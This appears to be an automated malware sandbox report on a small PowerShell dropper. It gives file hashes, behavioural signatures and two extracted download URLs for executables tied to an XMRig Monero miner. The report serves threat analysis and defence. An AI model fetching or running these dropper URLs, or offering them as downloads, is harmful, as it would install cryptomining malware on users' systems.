2d82ec0905de054cd685e6a52e2d9442

General
Target

2d82ec0905de054cd685e6a52e2d9442

Size

4KB

Sample

211014-fskfvsgcb9

Score
10 /10
MD5

2d82ec0905de054cd685e6a52e2d9442

SHA1

1fb5c5b876563affb7ee45872e286cf0ffddb965

SHA256

82f585a45f06cd6c344d3bf8fe6081a074ac38f83015d9675a2dc4e2363f5c20

SHA512

eeee0806ef980230966d3e6318d974fe6faf02b0b7952a1671cbc5fdff66c7cef68218483433a72ba6277ab9c5f556c7d3a39e2ad6851f42c4705f3d7a2666e4

Malware Config

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://cx55566.tmweb.ru/farm_money.exe

Extracted

Language ps1
Deobfuscated
URLs
exe.dropper

http://cx55566.tmweb.ru/monero-bandit.exe

Targets
Target

2d82ec0905de054cd685e6a52e2d9442

MD5

2d82ec0905de054cd685e6a52e2d9442

Filesize

4KB

Score
10 /10
SHA1

1fb5c5b876563affb7ee45872e286cf0ffddb965

SHA256

82f585a45f06cd6c344d3bf8fe6081a074ac38f83015d9675a2dc4e2363f5c20

SHA512

eeee0806ef980230966d3e6318d974fe6faf02b0b7952a1671cbc5fdff66c7cef68218483433a72ba6277ab9c5f556c7d3a39e2ad6851f42c4705f3d7a2666e4

Tags

Signatures

  • xmrig

    Description

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    Tags

  • XMRig Miner Payload

    Tags

  • Blocklisted process makes network request

  • Downloads MZ/PE file

  • Executes dropped EXE

  • Loads dropped DLL

  • Drops file in System32 directory

  • Suspicious use of SetThreadContext

Related Tasks

MITRE ATT&CK Matrix
Collection
    Command and Control
      Credential Access
        Defense Evasion
          Discovery
            Execution
              Exfiltration
                Impact
                  Initial Access
                    Lateral Movement
                      Persistence
                      Privilege Escalation
                        Tasks

                        static1

                        behavioral1

                        10/10

                        behavioral2

                        10/10